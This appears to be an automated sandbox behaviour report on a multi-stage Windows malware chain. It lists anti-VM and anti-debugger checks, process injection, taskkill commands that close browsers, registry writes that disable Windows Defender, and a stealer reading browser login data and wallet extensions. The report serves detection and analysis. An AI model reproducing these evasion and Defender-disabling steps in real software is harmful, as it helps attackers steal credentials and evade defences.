Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 98a7b9f337.exe, 00000022.00000002.2946404134.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: file.exe, 00000000.00000002.1711690435.00000000008FB000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1729072200.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1741802385.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, a6f0d09f38.exe, 0000000D.00000002.2942271609.00000000007E2000.00000040.00000001.01000000.0000000E.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2641791818.000000000069B000.00000040.00000001.01000000.0000000F.sdmp, 8b82d73f70.exe, 00000020.00000002.2916077534.000000000052D000.00000040.00000001.01000000.0000001A.sdmp, 98a7b9f337.exe, 00000022.00000002.2962320417.000000000174F000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001C.00000002.2980852938.000001DEE03B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_050F0D2C rdtsc 0_2_050F0D2C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0071652B mov eax, dword ptr fs:[00000030h] 6_2_0071652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0071A302 mov eax, dword ptr fs:[00000030h] 6_2_0071A302
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46A000
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46C000
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4FB5008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: GProgram Manager
Source: firefox.exe, 0000001C.00000002.2958480924.000000351FFFB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: firefox.exe, 0000001C.00000003.2809549596.000001DEFB06B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hSoftware\Policies\Microsoft\Windows\PersonalizationNoChangingStartMenuBackgroundPersonalColors_BackgroundWilStaging_02RtlDisownModuleHeapAllocationRtlQueryFeatureConfigurationRtlRegisterFeatureConfigurationChangeNotificationRtlSubscribeWnfStateChangeNotificationRtlDllShutdownInProgressntdll.dllNtQueryWnfStateDataLocal\SM0:%d:%d:%hs_p0Local\SessionImmersiveColorPreferenceBEGINTHMthmfile\Sessions\%d\Windows\ThemeSectionMessageWindowendthemewndThemeApiConnectionRequest\ThemeApiPortwinsta0SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\PersonalizeAppsUseLightThemeSystemUsesLightThemedefaultshell\themes\uxtheme\render.cppCompositedWindow::WindowdeletedrcacheMDIClientSoftware\Microsoft\Windows\DWMColorPrevalenceSoftware\Microsoft\Windows\CurrentVersion\ImmersiveShellTabletModeMENUAccentColorSoftware\Microsoft\Windows\CurrentVersion\Explorer\AccentDefaultStartColorControl Panel\DesktopAutoColorizationAccentColorMenuStartColorMenuAutoColorSoftware\Microsoft\Windows\CurrentVersion\Themes\History\ColorsSoftware\Microsoft\Windows\CurrentVersion\Themes\HistoryAccentPaletteTab$Shell_TrayWndLocal\SessionImmersiveColorMutex
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006FD3E2 cpuid 6_2_006FD3E2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_006FCBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006E65E0 LookupAccountNameA, 6_2_006E65E0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682431214.0000000005B91000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681603974.0000000005B91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 6.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2306646203.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1741706182.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1688680503.0000000004860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1729011202.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1671498988.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1711619647.0000000000701000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6e1fbaaba5.exe PID: 7984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a6f0d09f38.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
